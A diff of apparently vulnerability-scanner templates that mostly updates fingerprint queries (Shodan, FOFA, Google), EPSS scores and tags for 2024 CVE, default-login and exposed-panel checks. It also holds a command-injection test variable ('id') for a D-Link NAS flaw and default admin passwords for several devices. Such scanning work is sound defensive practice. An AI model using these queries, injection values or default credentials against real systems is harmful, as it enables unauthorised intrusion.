c64bac7317..001df73625 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -17,8 +17,13 @@ info: max-request: 1 vendor: ivanti product: connect_secure - shodan-query: "html:\"welcome.cgi?p=logo\"" - fofa-query: body="welcome.cgi?p=logo" + shodan-query: + - "html:\"welcome.cgi?p=logo\"" + - http.title:"ivanti connect secure" + - http.html:"welcome.cgi?p=logo" + fofa-query: + - body="welcome.cgi?p=logo" + - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" tags: cve,cve2024,xxe,ivanti variables: diff --git a/http/cves/2024/CVE-2024-22319.yaml b/http/cves/2024/CVE-2024-22319.yaml index 71a859f4ae..04aba3e984 100644 --- a/http/cves/2024/CVE-2024-22319.yaml +++ b/http/cves/2024/CVE-2024-22319.yaml @@ -19,8 +19,13 @@ info: max-request: 1 vendor: ibm product: operational_decision_manager - shodan-query: html:"IBM ODM" - fofa-query: title="IBM ODM" + shodan-query: + - html:"IBM ODM" + - http.html:"ibm odm" + fofa-query: + - title="IBM ODM" + - title="ibm odm" + - body="ibm odm" tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce http: diff --git a/http/cves/2024/CVE-2024-22320.yaml b/http/cves/2024/CVE-2024-22320.yaml index 9bfaf8ff89..4240eeec50 100644 --- a/http/cves/2024/CVE-2024-22320.yaml +++ b/http/cves/2024/CVE-2024-22320.yaml @@ -22,8 +22,13 @@ info: max-request: 1 vendor: ibm product: operational_decision_manager - shodan-query: html:"IBM ODM" - fofa-query: title="IBM ODM" + shodan-query: + - html:"IBM ODM" + - http.html:"ibm odm" + fofa-query: + - title="IBM ODM" + - title="ibm odm" + - body="ibm odm" tags: cve,cve2024,ibm,odm,decision-manager,deserialization,jsf,rce http: diff --git a/http/cves/2024/CVE-2024-22927.yaml b/http/cves/2024/CVE-2024-22927.yaml index 650fcab2c0..ba9abebe76 100644 --- a/http/cves/2024/CVE-2024-22927.yaml +++ b/http/cves/2024/CVE-2024-22927.yaml @@ -22,9 +22,10 @@ info: epss-percentile: 0.95082 cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: eyoucms product: eyoucms - fofa-query: title="eyoucms" + fofa-query: "title=\"eyoucms\"" tags: cve2024,cve,eyoucms,cms,xss http: diff --git a/http/cves/2024/CVE-2024-23917.yaml b/http/cves/2024/CVE-2024-23917.yaml index 4b5538ffe9..66902335a2 100644 --- a/http/cves/2024/CVE-2024-23917.yaml +++ b/http/cves/2024/CVE-2024-23917.yaml @@ -14,18 +14,20 @@ info: cvss-score: 9.8 cve-id: CVE-2024-23917 cwe-id: CWE-306,CWE-288 - epss-score: 0.00091 - epss-percentile: 0.38219 + epss-score: 0.04384 + epss-percentile: 0.92363 cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: jetbrains product: teamcity - shodan-query: http.title:teamcity - fofa-query: title=teamcity - google-query: intitle:teamcity - tags: cve,cve2024,auth-bypass,teamcity + shodan-query: + - "http.title:teamcity" + - http.component:"teamcity" + fofa-query: "title=teamcity" + google-query: "intitle:teamcity" + tags: cve,cve2024,auth-bypass,teamcity,jetbrains flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-24131.yaml b/http/cves/2024/CVE-2024-24131.yaml index 85820d38e9..8498796778 100644 --- a/http/cves/2024/CVE-2024-24131.yaml +++ b/http/cves/2024/CVE-2024-24131.yaml @@ -22,7 +22,9 @@ info: max-request: 1 vendor: superwebmailer product: superwebmailer - shodan-query: title:"SuperWebMailer" + shodan-query: + - title:"SuperWebMailer" + - http.title:"superwebmailer" fofa-query: title="superwebmailer" google-query: intitle:"superwebmailer" tags: cve,cve2024,superwebmailer,xss diff --git a/http/cves/2024/CVE-2024-25669.yaml b/http/cves/2024/CVE-2024-25669.yaml index 84ee144ab5..63ed8e2075 100644 --- a/http/cves/2024/CVE-2024-25669.yaml +++ b/http/cves/2024/CVE-2024-25669.yaml @@ -25,7 +25,9 @@ info: max-request: 1 vendor: a360inc product: caseaware - fofa-query: title="CaseAware" + fofa-query: + - title="CaseAware" + - title="caseaware" tags: cve,cve2024,xss,caseaware,a360inc http: diff --git a/http/cves/2024/CVE-2024-25735.yaml b/http/cves/2024/CVE-2024-25735.yaml index 4a66b1aedd..c8d2d8a071 100644 --- a/http/cves/2024/CVE-2024-25735.yaml +++ b/http/cves/2024/CVE-2024-25735.yaml @@ -20,7 +20,9 @@ info: max-request: 1 vendor: wyrestorm product: apollo vx20 - shodan-query: ssl:"WyreStorm Apollo VX20" + shodan-query: + - ssl:"WyreStorm Apollo VX20" + - ssl:"wyrestorm apollo vx20" tags: packetstorm,cve,cve2024,wyrestorm,info-leak http: diff --git a/http/cves/2024/CVE-2024-26331.yaml b/http/cves/2024/CVE-2024-26331.yaml index 749842e403..d8d5d1b9b6 100644 --- a/http/cves/2024/CVE-2024-26331.yaml +++ b/http/cves/2024/CVE-2024-26331.yaml @@ -18,7 +18,7 @@ info: verified: true max-request: 1 shodan-query: title:"ReCrystallize" - tags: cve,cve02024,recrystallize,auth-bypass + tags: cve,recrystallize,auth-bypass,cve2024 http: - method: GET diff --git a/http/cves/2024/CVE-2024-27198.yaml b/http/cves/2024/CVE-2024-27198.yaml index 6b5009efa5..0c304b3c1a 100644 --- a/http/cves/2024/CVE-2024-27198.yaml +++ b/http/cves/2024/CVE-2024-27198.yaml @@ -25,7 +25,10 @@ info: max-request: 1 vendor: jetbrains product: teamcity - shodan-query: http.component:"TeamCity" + shodan-query: + - http.component:"TeamCity" + - http.title:teamcity + - http.component:"teamcity" fofa-query: title=teamcity google-query: intitle:teamcity tags: cve,cve2024,teamcity,jetbrains,auth-bypass,kev diff --git a/http/cves/2024/CVE-2024-27497.yaml b/http/cves/2024/CVE-2024-27497.yaml index 4ea28ef36c..e081646a81 100644 --- a/http/cves/2024/CVE-2024-27497.yaml +++ b/http/cves/2024/CVE-2024-27497.yaml @@ -17,7 +17,7 @@ info: - https://github.com/fkie-cad/nvd-json-data-feeds classification: epss-score: 0.00053 - epss-percentile: 0.19682 + epss-percentile: 0.21091 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-27564.yaml b/http/cves/2024/CVE-2024-27564.yaml index 5c084baf08..65a8b04159 100644 --- a/http/cves/2024/CVE-2024-27564.yaml +++ b/http/cves/2024/CVE-2024-27564.yaml @@ -11,8 +11,8 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-27564 metadata: verified: true - max-request: 1 - fofa-query: title="ChatGPT个人专用版" + max-request: 2 + fofa-query: "title=\"ChatGPT个人专用版\"" tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi http: diff --git a/http/cves/2024/CVE-2024-29059.yaml b/http/cves/2024/CVE-2024-29059.yaml index 17e84f392e..1caaaf778a 100644 --- a/http/cves/2024/CVE-2024-29059.yaml +++ b/http/cves/2024/CVE-2024-29059.yaml @@ -23,7 +23,9 @@ info: max-request: 2 vendor: microsoft product: .net_framework - shodan-query: 'Server: MS .NET Remoting' + shodan-query: + - 'Server: MS .NET Remoting' + - "server: ms .net remoting" tags: cve,cve2024,dotnet,microsoft,remoting,deserialization http: diff --git a/http/cves/2024/CVE-2024-3097.yaml b/http/cves/2024/CVE-2024-3097.yaml index 4caca5cfd7..eb0aa9cab6 100644 --- a/http/cves/2024/CVE-2024-3097.yaml +++ b/http/cves/2024/CVE-2024-3097.yaml @@ -20,13 +20,16 @@ info: epss-percentile: 0.92605 cpe: cpe:2.3:a:imagely:nextgen_gallery:*:*:*:*:*:wordpress:*:* metadata: + max-request: 1 vendor: imagely - product: nextgen_gallery + product: "nextgen_gallery" framework: wordpress + shodan-query: + - "cpe:\"cpe:2.3:a:imagely:nextgen_gallery\"" + - http.html:/wp-content/plugins/nextgen-gallery/ + fofa-query: "body=/wp-content/plugins/nextgen-gallery/" publicwww-query: "/wp-content/plugins/nextgen-gallery/" - shodan-query: cpe:"cpe:2.3:a:imagely:nextgen_gallery" - fofa-query: body=/wp-content/plugins/nextgen-gallery/ - tags: cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak + tags: cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak,imagely http: - method: GET diff --git a/http/cves/2024/CVE-2024-31621.yaml b/http/cves/2024/CVE-2024-31621.yaml index 6adada63e3..074b6646ff 100644 --- a/http/cves/2024/CVE-2024-31621.yaml +++ b/http/cves/2024/CVE-2024-31621.yaml @@ -10,6 +10,9 @@ info: - https://www.exploit-db.com/exploits/52001 - https://github.com/FlowiseAI/Flowise/releases - https://flowiseai.com/ + classification: + epss-score: 0.00381 + epss-percentile: 0.72907 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-31848.yaml b/http/cves/2024/CVE-2024-31848.yaml index e05cb2e160..be4a41b369 100644 --- a/http/cves/2024/CVE-2024-31848.yaml +++ b/http/cves/2024/CVE-2024-31848.yaml @@ -21,8 +21,8 @@ info: epss-percentile: 0.21518 metadata: verified: true - max-request: 1 - shodan-query: title:"CData - API Server" + max-request: 2 + shodan-query: "title:\"CData - API Server\"" tags: cve,cve2024,cdata,lfi flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml index 7b52a6f010..f3cfac9d3d 100644 --- a/http/cves/2024/CVE-2024-31849.yaml +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -21,8 +21,8 @@ info: epss-percentile: 0.21091 metadata: verified: true - max-request: 1 - shodan-query: title:"CData Connect" + max-request: 2 + shodan-query: "title:\"CData Connect\"" tags: cve,cve2024,cdata,lfi flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-31850.yaml b/http/cves/2024/CVE-2024-31850.yaml index 5b2aef20bb..5305128715 100644 --- a/http/cves/2024/CVE-2024-31850.yaml +++ b/http/cves/2024/CVE-2024-31850.yaml @@ -19,8 +19,8 @@ info: epss-percentile: 0.21091 metadata: verified: true - max-request: 1 - shodan-query: title:"CData Arc" + max-request: 2 + shodan-query: "title:\"CData Arc\"" tags: cve,cve2024,cdata,lfi flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-31851.yaml b/http/cves/2024/CVE-2024-31851.yaml index e057749cbf..f4a5a8d55b 100644 --- a/http/cves/2024/CVE-2024-31851.yaml +++ b/http/cves/2024/CVE-2024-31851.yaml @@ -14,14 +14,13 @@ info: cvss-score: 8.6 cve-id: CVE-2024-31851 cwe-id: CWE-22 - epss-score: 0.00044 - epss-percentile: 0.09773 + epss-score: 0.00054 + epss-percentile: 0.21518 metadata: verified: true - max-request: 1 - shodan-query: title:"CData Sync" + max-request: 2 + shodan-query: "title:\"CData Sync\"" tags: cve,cve2024,cdata,lfi - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-32640.yaml b/http/cves/2024/CVE-2024-32640.yaml index 3a719ded91..fb7ccca466 100644 --- a/http/cves/2024/CVE-2024-32640.yaml +++ b/http/cves/2024/CVE-2024-32640.yaml @@ -18,7 +18,9 @@ info: max-request: 1 vendor: masacms product: masacms - shodan-query: 'Generator: Masa CMS' + shodan-query: + - 'Generator: Masa CMS' + - "generator: masa cms" tags: cve,cve2024,sqli,cms,masa,masacms http: diff --git a/http/cves/2024/CVE-2024-32651.yaml b/http/cves/2024/CVE-2024-32651.yaml index 1a2deb2d94..1a3315eb7e 100644 --- a/http/cves/2024/CVE-2024-32651.yaml +++ b/http/cves/2024/CVE-2024-32651.yaml @@ -16,8 +16,8 @@ info: cvss-score: 10 cve-id: CVE-2024-32651 cwe-id: CWE-1336 - epss-score: 0.00045 - epss-percentile: 0.14322 + epss-score: 0.00065 + epss-percentile: 0.28259 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml index 459f1a577c..bb24109108 100644 --- a/http/cves/2024/CVE-2024-3273.yaml +++ b/http/cves/2024/CVE-2024-3273.yaml @@ -16,14 +16,15 @@ info: cvss-score: 9.8 cve-id: CVE-2024-3273 cwe-id: CWE-77 + cpe: cpe:2.3:o:dlink:dns-320l_firmware:-:*:*:*:*:*:*:* epss-score: 0.83361 epss-percentile: 0.98438 - cpe: cpe:2.3:o:dlink:dns-320l_firmware:-:*:*:*:*:*:*:* metadata: verified: true vendor: dlink - product: dns-320l_firmware - fofa-query: app="D_Link-DNS-ShareCenter" + product: "dns-320l_firmware" + fofa-query: "app=\"D_Link-DNS-ShareCenter\"" + max-request: 1 tags: cve,cve2024,dlink,nas,kev variables: cmd: "id" diff --git a/http/cves/2024/CVE-2024-33575.yaml b/http/cves/2024/CVE-2024-33575.yaml index b24121f056..e125e8a9cc 100644 --- a/http/cves/2024/CVE-2024-33575.yaml +++ b/http/cves/2024/CVE-2024-33575.yaml @@ -19,13 +19,14 @@ info: epss-score: 0.00053 epss-percentile: 0.21091 metadata: - vendor: User Meta - product: User Meta + max-request: 1 + vendor: "User Meta" + product: "User Meta" framework: wordpress + shodan-query: "http.html:/wp-content/plugins/user-meta/" + fofa-query: "body=/wp-content/plugins/user-meta/" publicwww-query: "/wp-content/plugins/user-meta/" - shodan-query: http.html:/wp-content/plugins/user-meta/ - fofa-query: body=/wp-content/plugins/user-meta/ - tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak + tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak,User Meta http: - method: GET diff --git a/http/cves/2024/CVE-2024-33724.yaml b/http/cves/2024/CVE-2024-33724.yaml index c7cf477b96..cde00d75c5 100644 --- a/http/cves/2024/CVE-2024-33724.yaml +++ b/http/cves/2024/CVE-2024-33724.yaml @@ -14,7 +14,9 @@ info: max-request: 2 vendor: soplanning product: soplanning - shodan-query: html:"soplanning" + shodan-query: + - html:"soplanning" + - http.html:"soplanning" fofa-query: body="soplanning" tags: packetstorm,cve,cve2024,authenticated,soplanning,xss diff --git a/http/cves/2024/CVE-2024-3400.yaml b/http/cves/2024/CVE-2024-3400.yaml index 5b916b447f..e7d578bcf0 100644 --- a/http/cves/2024/CVE-2024-3400.yaml +++ b/http/cves/2024/CVE-2024-3400.yaml @@ -22,12 +22,15 @@ info: cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:-:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 3 vendor: paloaltonetworks - product: pan-os - shodan-query: http.favicon.hash:-631559155 - fofa-query: icon_hash="-631559155" - tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev,intrusive + product: "pan-os" + shodan-query: + - "http.favicon.hash:-631559155" + - http.favicon.hash:"-631559155" + - cpe:"cpe:2.3:o:paloaltonetworks:pan-os" + fofa-query: "icon_hash=\"-631559155\"" + tags: cve,cve2024,globalprotect,pan-os,rce,oast,kev,intrusive,paloaltonetworks http: - raw: diff --git a/http/cves/2024/CVE-2024-34470.yaml b/http/cves/2024/CVE-2024-34470.yaml index f61ad1d0e7..aedfed7ed9 100644 --- a/http/cves/2024/CVE-2024-34470.yaml +++ b/http/cves/2024/CVE-2024-34470.yaml @@ -19,7 +19,7 @@ info: epss-percentile: 0.0866 metadata: verified: true - max-request: 1 + max-request: 2 fofa-query: "mailinspector/public" tags: cve,cve2024,lfi,mailinspector,hsc diff --git a/http/cves/2024/CVE-2024-3822.yaml b/http/cves/2024/CVE-2024-3822.yaml index 701c9b23f8..ec21ffbb89 100644 --- a/http/cves/2024/CVE-2024-3822.yaml +++ b/http/cves/2024/CVE-2024-3822.yaml @@ -1,28 +1,28 @@ id: CVE-2024-3822 -info: - name: Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting - author: omranisecurity - severity: medium - description: | - The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. - reference: | - - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ - - https://nvd.nist.gov/vuln/detail/CVE-2024-3822 - - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N - cvss-score: 6.5 - cve-id: CVE-2024-3822 - cwe-id: CWE-79 - epss-score: 0.00043 - epss-percentile: 0.0866 - metadata: - verified: true - max-request: 1 - fofa-query: "wp-content/plugins/base64-encoderdecoder/" - tags: cve,cve2024,wordpress,wp-plugin,wp,xss,base64-encoderdecoder - +info: + name: Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting + author: omranisecurity + severity: medium + description: | + The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + reference: | + - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-3822 + - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2024-3822 + cwe-id: CWE-79 + epss-score: 0.00043 + epss-percentile: 0.0866 + metadata: + verified: true + max-request: 1 + fofa-query: "wp-content/plugins/base64-encoderdecoder/" + tags: cve,cve2024,wordpress,wp-plugin,wp,xss,base64-encoderdecoder + http: - method: GET path: diff --git a/http/cves/2024/CVE-2024-4040.yaml b/http/cves/2024/CVE-2024-4040.yaml index d821c13c56..0b82cbea2a 100644 --- a/http/cves/2024/CVE-2024-4040.yaml +++ b/http/cves/2024/CVE-2024-4040.yaml @@ -25,11 +25,13 @@ info: cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 2 + max-request: 5 vendor: crushftp product: crushftp - shodan-query: html:"CrushFTP" - fofa-query: body="crushftp" + shodan-query: + - "html:\"CrushFTP\"" + - http.html:"crushftp" + fofa-query: "body=\"crushftp\"" tags: cve,cve2024,lfr,crushftp,vfs,kev flow: | if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) { diff --git a/http/cves/2024/CVE-2024-4348.yaml b/http/cves/2024/CVE-2024-4348.yaml index b4e1655549..fd4b518a60 100644 --- a/http/cves/2024/CVE-2024-4348.yaml +++ b/http/cves/2024/CVE-2024-4348.yaml @@ -23,7 +23,7 @@ info: verified: true max-request: 2 shodan-query: html:"osCommerce" - tags: packetstorm,xss,rxss,oscommerce + tags: packetstorm,xss,rxss,oscommerce,cve2024,cve http: - method: GET diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml index 031ce07c3b..c4bc18267d 100644 --- a/http/cves/2024/CVE-2024-4358.yaml +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -13,11 +13,10 @@ info: - https://github.com/sinsinology/CVE-2024-4358 - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358 metadata: - shodan-query: title:"Log in | Telerik Report Server" verified: true max-request: 2 + shodan-query: title:"Log in | Telerik Report Server" tags: cve,cve2024,telerik,progress,auth-bypass,instrusive - variables: user: "{{rand_base(6)}}" pass: "{{rand_base(8)}}" diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index 8b34fb7f1f..d75eb1260b 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -24,8 +24,10 @@ info: max-request: 1 vendor: sonatype product: nexus - fofa-query: title="Nexus Repository Manager" - tags: cve,cve2024,nexus,lfi + fofa-query: + - title="Nexus Repository Manager" + - title="nexus repository manager" + tags: cve,cve2024,nexus,lfi,sonatype http: - method: GET diff --git a/http/default-logins/3com/3Com-wireless-default-login.yaml b/http/default-logins/3com/3Com-wireless-default-login.yaml index 321a07e084..ff639e033e 100644 --- a/http/default-logins/3com/3Com-wireless-default-login.yaml +++ b/http/default-logins/3com/3Com-wireless-default-login.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.speedguide.net/routers/3com-wl-546-3com-wireless-8760-dual-radio-11abg-1256 metadata: - max-request: 1 - fofa-query: title="3COM" + max-request: 2 + fofa-query: "title=\"3COM\"" tags: default-login,3com http: diff --git a/http/default-logins/ampjuke-default-login.yaml b/http/default-logins/ampjuke-default-login.yaml index 7cba568c40..1eb6139034 100644 --- a/http/default-logins/ampjuke-default-login.yaml +++ b/http/default-logins/ampjuke-default-login.yaml @@ -5,10 +5,10 @@ info: author: ritikchaddha severity: high description: | - AmpJuke contains a default login vulnerability. Default admin login password 'pass' was found. + AmpJuke contains a default login vulnerability. Default admin login password 'pass' was found. metadata: - max-request: 2 - shodan-query: http.favicon.hash:-121681558 + max-request: 3 + shodan-query: "http.favicon.hash:-121681558" tags: default-login,ampjuke http: diff --git a/http/default-logins/asus/asus-rtn16-default-login.yaml b/http/default-logins/asus/asus-rtn16-default-login.yaml index 6e555fad8a..2ebca97d0b 100644 --- a/http/default-logins/asus/asus-rtn16-default-login.yaml +++ b/http/default-logins/asus/asus-rtn16-default-login.yaml @@ -5,11 +5,11 @@ info: author: ritikchaddha severity: high description: | - ASUS RT-N16 contains a default login vulnerability. Default admin login password 'admin' was found. + ASUS RT-N16 contains a default login vulnerability. Default admin login password 'admin' was found. metadata: + verified: true max-request: 1 shodan-query: "RT-N16" - verified: true tags: default-login,asus,rt-n16 http: diff --git a/http/default-logins/asus/asus-wl500g-default-login.yaml b/http/default-logins/asus/asus-wl500g-default-login.yaml index 1e874faedb..15637088ad 100644 --- a/http/default-logins/asus/asus-wl500g-default-login.yaml +++ b/http/default-logins/asus/asus-wl500g-default-login.yaml @@ -5,11 +5,11 @@ info: author: ritikchaddha severity: high description: | - ASUS WL-500 contains a default login vulnerability. Default admin login password 'admin' was found. + ASUS WL-500 contains a default login vulnerability. Default admin login password 'admin' was found. metadata: + verified: true max-request: 1 shodan-query: "WL-500G" - verified: true tags: default-login,asus,wl-500 http: diff --git a/http/default-logins/asus/asus-wl520GU-default-login.yaml b/http/default-logins/asus/asus-wl520GU-default-login.yaml index a972e1e1c2..5fa19cc132 100644 --- a/http/default-logins/asus/asus-wl520GU-default-login.yaml +++ b/http/default-logins/asus/asus-wl520GU-default-login.yaml @@ -5,11 +5,11 @@ info: author: ritikchaddha severity: high description: | - ASUS WL-520GU contains a default login vulnerability. The default admin login password 'admin' was found. + ASUS WL-520GU contains a default login vulnerability. The default admin login password 'admin' was found. metadata: + verified: true max-request: 1 shodan-query: "WL-520GU" - verified: true tags: default-login,asus,wl-520gu http: diff --git a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml index eeacaeb7fa..de7bd52229 100644 --- a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml +++ b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml @@ -8,8 +8,8 @@ info: Cambium Networks / Motorola Canopy 5750AP ADVANTAGE Access Point 5.7GHz login credentials were discovered. metadata: verified: true - max-request: 1 - fofa-query: title="Welcome to Canopy" + max-request: 2 + fofa-query: "title=\"Welcome to Canopy\"" tags: default-login,cambium,canopy http: diff --git a/http/default-logins/crushftp/crushftp-anonymous-login.yaml b/http/default-logins/crushftp/crushftp-anonymous-login.yaml index e768a596a1..df62621678 100644 --- a/http/default-logins/crushftp/crushftp-anonymous-login.yaml +++ b/http/default-logins/crushftp/crushftp-anonymous-login.yaml @@ -7,10 +7,10 @@ info: description: | CrushFTP Anonymous login credentials were discovered. metadata: - shodan-query: html:"CrushFTP" verified: true max-request: 2 - tags: default-logins,anonymous,crushftp + shodan-query: html:"CrushFTP" + tags: default-logins,anonymous,crushftp,default-login http: - raw: diff --git a/http/default-logins/crushftp/crushftp-default-login.yaml b/http/default-logins/crushftp/crushftp-default-login.yaml index 4528994223..6fc4e57c36 100644 --- a/http/default-logins/crushftp/crushftp-default-login.yaml +++ b/http/default-logins/crushftp/crushftp-default-login.yaml @@ -7,9 +7,9 @@ info: description: | CrushFTP default login credentials were discovered. metadata: - shodan-query: html:"CrushFTP" verified: true max-request: 2 + shodan-query: html:"CrushFTP" tags: default-login,crushftp http: diff --git a/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml index d5ad80f909..07fb4f6937 100644 --- a/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml +++ b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml @@ -10,8 +10,9 @@ info: - https://digitalwatchdog.happyfox.com/kb/article/686-recorder-and-raid-default-login-list/ metadata: verified: true - shodan-query: http.favicon.hash:868509217 - fofa-query: icon_hash="868509217" + max-request: 8 + shodan-query: "http.favicon.hash:868509217" + fofa-query: "icon_hash=\"868509217\"" tags: digital-watchdog,default-login,dw-Spectrum http: diff --git a/http/default-logins/next-terminal/next-terminal-default-login.yaml b/http/default-logins/next-terminal/next-terminal-default-login.yaml index fd94360b85..1e5d1c9dff 100644 --- a/http/default-logins/next-terminal/next-terminal-default-login.yaml +++ b/http/default-logins/next-terminal/next-terminal-default-login.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/dushixiang/next-terminal metadata: + verified: true max-request: 1 fofa-query: title="Next Terminal" - verified: true tags: default-login,next-terminal,next http: diff --git a/http/default-logins/pentaho/pentaho-default-login.yaml b/http/default-logins/pentaho/pentaho-default-login.yaml index 11b51557b7..3498eacd35 100644 --- a/http/default-logins/pentaho/pentaho-default-login.yaml +++ b/http/default-logins/pentaho/pentaho-default-login.yaml @@ -14,6 +14,8 @@ info: metadata: max-request: 1 shodan-query: pentaho + product: vantara_pentaho + vendor: hitachi tags: pentaho,default-login http: diff --git a/http/default-logins/soplanning/soplanning-default-login.yaml b/http/default-logins/soplanning/soplanning-default-login.yaml index 817121268f..7e628a37e3 100644 --- a/http/default-logins/soplanning/soplanning-default-login.yaml +++ b/http/default-logins/soplanning/soplanning-default-login.yaml @@ -13,7 +13,10 @@ info: max-request: 1 vendor: soplanning product: soplanning - shodan-query: html:"soplanning" + shodan-query: + - html:"soplanning" + - http.html:"soplanning" + fofa-query: body="soplanning" tags: soplanning,default-login http: diff --git a/http/default-logins/structurizr/structurizr-default-login.yaml b/http/default-logins/structurizr/structurizr-default-login.yaml index fb0db3fe69..a27eae52ac 100644 --- a/http/default-logins/structurizr/structurizr-default-login.yaml +++ b/http/default-logins/structurizr/structurizr-default-login.yaml @@ -12,6 +12,9 @@ info: verified: true max-request: 3 shodan-query: http.favicon.hash:1199592666 + product: on-premises_installation + vendor: structurizr + fofa-query: icon_hash=1199592666 tags: structurizr,default-login http: diff --git a/http/default-logins/timekeeper/timekeeper-default-login.yaml b/http/default-logins/timekeeper/timekeeper-default-login.yaml index 8fc8bb40d7..f7155cda24 100644 --- a/http/default-logins/timekeeper/timekeeper-default-login.yaml +++ b/http/default-logins/timekeeper/timekeeper-default-login.yaml @@ -12,6 +12,9 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:2134367771 + product: timekeeper + vendor: fsmlabs + fofa-query: icon_hash=2134367771 tags: timekeeper,default-login http: diff --git a/http/default-logins/wazuh-default-login.yaml b/http/default-logins/wazuh-default-login.yaml index 2f31694d0f..550b41dad8 100644 --- a/http/default-logins/wazuh-default-login.yaml +++ b/http/default-logins/wazuh-default-login.yaml @@ -12,8 +12,8 @@ info: - https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment metadata: verified: true - max-request: 6 - shodan-query: title:"Wazuh" + max-request: 7 + shodan-query: "title:\"Wazuh\"" tags: wazuh,default-login http: diff --git a/http/default-logins/xxljob/xxljob-default-login.yaml b/http/default-logins/xxljob/xxljob-default-login.yaml index ae2e65c308..25015851a7 100644 --- a/http/default-logins/xxljob/xxljob-default-login.yaml +++ b/http/default-logins/xxljob/xxljob-default-login.yaml @@ -15,6 +15,9 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:1691956220 + product: xxl-job + vendor: xuxueli + fofa-query: icon_hash=1691956220 tags: default-login,xxljob http: diff --git a/http/default-logins/zabbix/zabbix-default-login.yaml b/http/default-logins/zabbix/zabbix-default-login.yaml index 0f957d6459..6da48b963c 100644 --- a/http/default-logins/zabbix/zabbix-default-login.yaml +++ b/http/default-logins/zabbix/zabbix-default-login.yaml @@ -12,7 +12,7 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 1 + max-request: 2 tags: zabbix,default-login http: diff --git a/http/exposed-panels/3cx-phone-management-panel.yaml b/http/exposed-panels/3cx-phone-management-panel.yaml index 2a0e1a613a..3c0392dcb7 100644 --- a/http/exposed-panels/3cx-phone-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-management-panel.yaml @@ -14,13 +14,22 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:3cx:3cx:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"3CX Phone System Management Console" max-request: 1 + vendor: 3cx product: 3cx shodan-query: - http.title:"3CX Phone System Management Console" - http.favicon.hash:970132176 - vendor: 3cx + - http.title:"3cx webclient" + - http.title:"3cx phone system management console" + google-query: + - intitle:"3CX Phone System Management Console" + - intitle:"3cx phone system management console" + - intitle:"3cx webclient" + fofa-query: + - icon_hash=970132176 + - title="3cx phone system management console" + - title="3cx webclient" tags: panel,3cx http: diff --git a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml index 